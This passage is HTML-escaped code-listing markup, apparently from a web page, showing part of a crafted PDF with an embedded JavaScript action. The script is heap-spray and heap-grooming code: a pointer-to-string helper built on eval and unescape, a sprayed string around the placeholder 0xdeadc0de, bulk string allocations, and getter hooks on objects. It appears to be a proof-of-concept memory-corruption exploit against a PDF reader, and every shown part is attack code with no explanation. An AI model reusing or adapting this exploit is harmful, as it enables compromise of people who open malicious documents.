class=\"crayon-v\">Subtype<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">Type1<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14412810637220-52\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">Name<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">F1<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14412810637220-53\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">BaseFont<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">Helvetica<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14412810637220-54\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">Encoding<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">MacRomanEncoding<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14412810637220-55\"><span class=\"crayon-o\">&gt;&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14412810637220-56\"><span class=\"crayon-i\">endobj<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14412810637220-57\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14412810637220-58\"><span class=\"crayon-cn\">7<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">obj<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14412810637220-59\"><span class=\"crayon-o\">&lt;&lt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14412810637220-60\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">Type<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">Action<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14412810637220-61\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">S<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">JavaScript<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14412810637220-62\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-e\">JS<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14412810637220-63\"><span class=\"crayon-v\">console<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">show<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14412810637220-64\"><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">log<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">s<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14412810637220-65\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">console<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">println<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;-&gt; &#8220;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">s<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">toString<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14412810637220-66\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">Math<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">atan<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">s<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">toString<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14412810637220-67\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14412810637220-68\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14412810637220-69\"><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ptr2str<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">ptr<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14412810637220-70\"><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14412810637220-71\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-c\">\/*<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14412810637220-72\"><span class=\"crayon-c\">\tin: pointer<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14412810637220-73\"><span class=\"crayon-c\">\tout: 2-char string which represents this pointer on the heap<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14412810637220-74\"><span class=\"crayon-c\">\t*\/<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14412810637220-75\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">p1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">ptr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">24<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;&gt;&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0xff<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">toString<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">16<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14412810637220-76\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">p1<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">length<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">p1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;0&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">p1<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14412810637220-77\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">p2<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">ptr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">16<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0xff<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">toString<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">16<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14412810637220-78\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">p2<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">length<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">p2<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;0&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">p2<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14412810637220-79\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">p3<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">ptr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0xff<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">toString<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">16<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14412810637220-80\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">p3<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">length<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">p3<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;0&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">p3<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14412810637220-81\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">p4<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">ptr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0xff<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">toString<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">16<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14412810637220-82\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">p4<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">length<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">p4<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;0&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">p4<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14412810637220-83\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">eval<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;unescape(&#8216;%u&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">p3<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">p4<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;%u&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">p1<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">p2<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;&#8216;)&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14412810637220-84\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14412810637220-85\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14412810637220-86\"><span class=\"crayon-v\">basestring<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">unescape<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;%uaaaa%uaaaa%uaaaa%uaaaa%uaaaa%uaaaa%uaaaa%uaaaa%uaaaa%uaaaa%uaaaa%uaaaa&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ptr2str<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">0xdeadc0de<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x18<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14412810637220-87\"><span class=\"crayon-st\">while<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">basestring<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">length<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x100<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">basestring<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">unescape<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;%ueeee&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14412810637220-88\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14412810637220-89\"><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">allocs<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">count<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">size<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">basestring<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14412810637220-90\"><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14412810637220-91\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">arr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14412810637220-92\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-st\">for<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">count<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-o\">++<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">arr<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">push<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">basestring<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">substr<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">size<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">toUpperCase<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14412810637220-93\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">arr<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14412810637220-94\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14412810637220-95\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14412810637220-96\"><span class=\"crayon-v\">globarr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14412810637220-97\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14412810637220-98\"><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">somefunc<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14412810637220-99\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14412810637220-100\"><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">obj1_read<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14412810637220-101\"><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14412810637220-102\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">log<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;[obj1_read], get read property&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14412810637220-103\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">globarr<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">push<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">allocs<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">0x200<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x88<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">basestring<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14412810637220-104\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">undefined<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14412810637220-105\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14412810637220-106\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14412810637220-107\"><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">obj1_write<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14412810637220-108\"><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14412810637220-109\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">log<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;[obj1_write], get write property&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14412810637220-110\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">somefunc<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14412810637220-111\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14412810637220-112\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14412810637220-113\"><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">obj2_read<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14412810637220-114\"><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14412810637220-115\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">log<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;[obj2_read], get read property&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14412810637220-116\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">undefined<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14412810637220-117\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14412810637220-118\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14412810637220-119\"><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">obj2_write<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14412810637220-120\"><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14412810637220-121\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">log<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;[obj2_write], get write property&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14412810637220-122\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">somefunc<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14412810637220-123\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14412810637220-124\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14412810637220-125\"><span class=\"crayon-v\">obj1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">Object<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14412810637220-126\"><span class=\"crayon-v\">obj1<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">__defineGetter__<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;read&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">obj1_read<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14412810637220-127\"><span class=\"crayon-v\">obj1<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">__defineGetter__<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;write&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">obj1_write<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14412810637220-128\"><span class=\"crayon-v\">obj2<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">Object<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14412810637220-129\"><span class=\"crayon-v\">obj2<\/span><span class=\"crayon-sy\">.<\/span><span 